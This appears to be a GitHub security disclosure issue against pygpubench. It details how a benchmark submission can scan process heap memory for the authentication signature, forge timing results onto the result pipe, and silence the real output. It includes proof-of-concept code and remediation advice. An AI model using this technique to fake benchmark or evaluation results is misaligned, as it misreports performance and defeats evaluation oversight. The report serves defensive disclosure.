Skip to content

pygpubench Signature Authentication Bypass #23

@josusanmartin

Description

@josusanmartin

Summary

pygpubench authenticates benchmark results using a random signature that is sent from the parent process to the child process over a pipe. The child's C++ code stores this signature in a std::string on the heap. Because the child process can read its own /proc/self/maps and scan heap memory with ctypes, it can extract the signature, write forged results to the inherited pipe fd, and redirect the pipe to /dev/null before the C++ benchmark loop runs. The parent accepts the forged results because they contain the correct signature.

This is a complete benchmark bypass: the attacker controls all reported times, error counts, and completion status without running a real kernel.

Severity

Critical — full benchmark integrity failure for any problem using do_bench_isolated.

Affected Component

pygpubench.do_bench_isolated — specifically the signature-based result authentication in python/pygpubench/__init__.py:230-259 and the signature storage in csrc/manager.cpp:127.

Root Cause

The signature is a shared secret between the parent and child processes. It is transmitted to the child over a pipe (sig_r/sig_w), read by the C++ code in read_benchmark_parameters, and stored in BenchmarkManager::mSignature (a std::string member). The untrusted kernel is imported after the signature is already in child-process memory. Since the child process runs attacker-controlled Python code, the attacker can read arbitrary process memory using ctypes and recover the signature.

Why existing defenses don't prevent this

Defense Why it doesn't help
PR_SET_DUMPABLE=0 Prevents other processes from reading /proc/PID/mem. Does not affect the process reading its own /proc/self/maps (inode mode S_IRUGO = 0444, world-readable). Does not affect ctypes memory access (direct pointer dereference, no filesystem I/O).
Landlock Allows read-only access to / (covers procfs). Allows read-write access to /dev (needed for /dev/null redirect). Does not restrict ctypes or os.write to inherited pipe fds.
PR_SET_NO_NEW_PRIVS Prevents privilege escalation. Does not restrict memory reads within the process.
C++ benchmark loop Runs after the kernel is imported. The exploit injects forged results at import time, before the benchmark loop starts.
Error counter randomization Irrelevant — the exploit forges the error-count field directly in the pipe output, bypassing the GPU-side counter entirely.

The attack chain

Parent                                          Child (subprocess)
──────                                          ──────────────────
secrets.token_hex(16) → signature
write signature to sig_w pipe ──────────────►   C++ reads sig_r → mSignature (heap)
                                                C++ calls setup_benchmark()
                                                C++ installs landlock
                                                C++ calls kernel_from_qualname()
                                                  └─► import submission  ◄──── ATTACKER CODE RUNS HERE
                                                        ├─ gc.get_objects() → count tuples → repeats
                                                        ├─ open("/proc/self/maps") → heap regions
                                                        ├─ ctypes.string_at(heap) → signature
                                                        ├─ os.fstat(0..255) → pipe fd
                                                        ├─ os.write(pipe_fd, forged_results + signature)
                                                        ├─ os.dup2(/dev/null, pipe_fd)
                                                        └─ define correct kernel()
                                                C++ benchmark loop runs (writes go to /dev/null)
                                                process exits with code 0
reads pipe → forged data       ◄────────────
validates signature → PASS
accepts forged times (0.42 µs)

Proof of Concept

File: submission_memscan_signature.py

The PoC runs entirely at import time (before the C++ benchmark loop executes):

# Step 1: Count (tensor, rtol, atol) tuples in gc → infer repeats
for obj in gc.get_objects():
    if isinstance(obj, tuple) and len(obj) == 3:
        a, b, c = obj
        if isinstance(a, torch.Tensor) and a.is_cuda and isinstance(b, float) ...
            expected_count += 1
repeats = expected_count - 1  # subtract warmup slot

# Step 2: Read /proc/self/maps, scan heap for 32-char hex string
with open('/proc/self/maps') as f:
    for line in f:
        start, end = parse_address_range(line)
        data = ctypes.string_at(start, end - start)
        for match in re.finditer(rb'(?<![0-9a-f])([0-9a-f]{32})\x00', data):
            candidates.append(match.group(1).decode())

# Step 3: Find pipe fd
for fd in range(256):
    if stat.S_ISFIFO(os.fstat(fd).st_mode):
        pipe_fds.append(fd)

# Step 4: Write forged results with extracted signature
payload = "event-overhead\t0.002 us\n"
for i in range(repeats):
    payload += f"{i}\t0.42\n"       # 0.42 µs per iteration
payload += f"signature\t{signature}\n"
os.write(pipe_fd, payload.encode())

# Step 5: Redirect pipe to /dev/null (C++ output goes nowhere)
os.dup2(os.open('/dev/null', os.O_WRONLY), pipe_fd)

# Step 6: Correct kernel so process exits cleanly (exit code 0)
def kernel(output, inp):
    torch.sum(inp * weights, dim=-1, out=output)

Running the PoC

cd pygpubench/exploits
python run_all.py submission_memscan_signature

Expected output: CHEAT SUCCEEDED (bypassed detection) — the benchmark reports 0.42 µs per iteration with no errors, despite the kernel not being the one that was timed.

Prerequisites

  • Linux (for /proc/self/maps and landlock)
  • CUDA GPU (for torch tensor operations)
  • pygpubench installed (pip install pygpubench)

Additional Findings

GC metadata leakage (HIGH)

At kernel import time, gc.get_objects() reveals all expected-output tuples (tensor, rtol, atol) created by the test generator. Even though the tensor data has been zeroed, the Python tuple objects are still alive because the C++ std::vector<nb::tuple> holds strong references. This reveals:

  • Exact repeats value — needed to construct correctly-sized forged results
  • Output tensor shapes and dtypes — useful for other exploit strategies
  • Tolerance values — useful for crafting outputs that barely pass

The signature exploit depends on this to know how many iteration results to forge.

Source: csrc/manager.cpp:143-166setup_benchmark stores tuples in vectors that persist through do_bench_py.

Fix: After copying expected data to C++ memory, release the Python tuple references (expected.clear()) and call gc.collect() before importing the kernel.

Warmup detection (MEDIUM)

The warmup phase always uses args.at(0) (csrc/manager.cpp:301-324). The kernel can detect warmup by tracking input.data_ptr() (same pointer every warmup call, different pointer for benchmark calls) and add artificial delay to inflate time_estimate, reducing actual_calls to the minimum of 3.

Fix: Randomize which test case is used for warmup.

NaN wildcard in checker (LOW, latent)

csrc/check.cu:44-46 treats NaN in expected output as a wildcard:

if (isnan(a))
    return;  // accepts ANY received value

Currently not exploitable because expected outputs are in non-torch cudaMalloc memory at unknown addresses. But if any future attack vector reveals those addresses, NaN injection would bypass correctness entirely.

Fix: Remove the NaN wildcard. Treat NaN in expected output as a test-generation bug and fail the benchmark.

ctypes CUDA runtime access (LOW, latent)

The submission can call CUDA runtime functions via ctypes.CDLL('libcudart.so') — including cudaMemcpy, cudaMemset, and cudaPointerGetAttributes. Combined with heuristics about cudaMalloc allocation patterns, this could theoretically locate expected output copies or the error counter in GPU memory.

Currently impractical because: (a) the error counter has a random offset + random shift in a 2 MiB arena, and (b) expected output addresses are not predictable. But this is a latent risk.

Fix: Consider seccomp filters to restrict CUDA-related ioctl syscalls to only the specific ioctls needed for kernel launch and synchronization.

Recommended Fixes

For the signature bypass (critical)

Option A: HMAC-based authentication (minimal change)

  1. At C++ init time (before any user code), read 32 bytes from /dev/urandom into a local C++ variable
  2. Send these bytes to the parent over a one-way pipe (parent reads, child writes, pipe is closed)
  3. After the benchmark loop, compute HMAC-SHA256 over the raw result bytes using the key
  4. Append the HMAC tag to the pipe output
  5. Overwrite the key in memory (memset_explicit) before importing the kernel
  6. The parent recomputes the HMAC and rejects mismatches

Since the key is consumed and explicitly overwritten before the kernel is imported, memory scanning cannot recover it.

Option B: Separate validator process (stronger)

Run the benchmark in a three-process architecture:

  • Orchestrator (trusted): generates test cases, owns the result pipe
  • Worker (untrusted): runs the kernel, writes raw timing events to a pipe
  • Validator (trusted, never imports submission): reads the same inputs, runs the reference kernel, compares outputs

The worker never sees expected outputs or authentication keys.

For GC metadata leakage

// In do_bench_py, after copying expected outputs:
expected.clear();      // release Python tuple references
trigger_gc();          // clean up
// THEN import the kernel

For warmup detection

// Instead of always using args.at(0):
std::uniform_int_distribution<int> warmup_dist(0, calls);
int warmup_idx = warmup_dist(rng);
// Use args.at(warmup_idx) for warmup

For NaN wildcard

// In check_approx_match_kernel:
if (isnan(a)) {
    ++res;  // NaN in expected = test bug, not wildcard
    return;
}

What pygpubench Gets Right

Despite this finding, pygpubench is a massive improvement over the original evaluator:

Attack class Original evaluator pygpubench
__code__ patching Trivially exploitable Fully blocked (C++ implementation)
torch.cuda.Event patching Trivially exploitable Fully blocked (C CUDA API)
GC NaN injection on expected outputs N/A (no protection) Blocked (cudaMalloc copy + zeroing)
GC answer copy N/A (no protection) Blocked (expected data zeroed)
Stream-based timing manipulation N/A (no protection) Blocked (programmatic stream serialization + randomized block checking)
Filesystem tampering N/A (no sandboxing) Blocked (landlock)
Error counter manipulation N/A (no counter) Effectively blocked (random offset + shift)
Input caching N/A (no protection) Blocked (shadow args + canaries + L2 clear)

The old Class 1 (__code__ patching) and Class 2 (timing infrastructure patching) exploits that affected every leaderboard on gpumode.com/home are completely eliminated. The remaining signature bypass requires significantly more sophistication and is straightforward to fix.

Disclosure Timeline

Date Event
2026-03-07 Original evaluator vulnerability disclosed to GPU MODE team
2026-03-07 GPU MODE responds, points to pygpubench as the replacement
2026-03-07 pygpubench security review conducted; signature bypass identified
2026-03-07 This report and PoC prepared

Files

File Description
submission_memscan_signature.py PoC exploit: memory scan + pipe hijack
This document Full security audit and disclosure

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Type

    No type

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions